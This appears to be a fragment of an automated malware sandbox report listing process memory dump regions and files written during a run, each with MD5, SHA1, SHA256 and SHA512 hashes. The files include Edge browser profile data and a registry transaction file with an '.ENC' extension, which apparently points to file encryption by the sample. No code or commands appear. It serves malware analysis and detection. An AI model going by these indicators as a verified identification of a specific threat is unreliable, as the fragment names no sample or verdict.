memory/5228-609-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/5228-608-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/1428-618-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/1428-617-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/1428-620-0x000001AACD8A0000-0x000001AACD8B6000-memory.dmp
memory/5176-683-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/5176-684-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/5864-716-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/5864-715-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/5916-766-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/5916-767-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/460-837-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/460-838-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 008114e1a1a614b35e8a7515da0f3783 |
| SHA1 | 3c390d38126c7328a8d7e4a72d5848ac9f96549b |
| SHA256 | 7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18 |
| SHA512 | a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b |
memory/4308-892-0x0000028CC6560000-0x0000028CC656C000-memory.dmp
C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC
| MD5 | c2b914d622e71b24319d75f11166b584 |
| SHA1 | 746581a2292c8fdafd5665ac01b3f14d76633edd |
| SHA256 | 9e15682ed642c1c152fc5a4cab912b213dd546813982d2d70adde11b5202c5ed |
| SHA512 | 7658d847b08c5d8ca062a8a69b0ab9589f4fd554225601705f3c6672ea8fd23267e606d0e3999e125282e1179a1f064000fbc4dfa9aeb5129247b7625a6f055d |
memory/4308-1107-0x0000028CC6A70000-0x0000028CC6A7C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b5571f0e979dfe4b4988b56c6cda3b0d |
| SHA1 | 88595bcd9c4936725a18d0e35b6ea5f059d7773a |
| SHA256 | 22ac81f37cf9a7e965b5692b1d772ab4b7d7d0dafadc479bac78dd94bd7cd6d9 |
| SHA512 | 75d404e73bcf71dafb2b8e33fa032af8f66adddd2dea106bae3abbd5f4ffb3205d35de16e81bf1f70c8d57ba0a67963fb5474169cc9094c7403df58aa2866d3a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 34ba88c0318ca7b09d73f8b27b38711b |
| SHA1 | 801b00136cd012a853b49f016b139ad581a4fa87 |
| SHA256 | 5a01daaa5be0a36b3980d07f8c0c8f319a635df5166978830c70b3d7e1c310bc |
| SHA512 | a70b734de78fd73661def3a95139c25e140527cfd38dda134da6f8facda089ccf6ba48e526bdebf881be92846506f36c7c514353a590490165ba868d346ea8d5 |
memory/4308-1800-0x0000028CC6A80000-0x0000028CC6DD0000-memory.dmp
memory/4308-1801-0x0000028CC6DD0000-0x0000028CC6DDE000-memory.dmp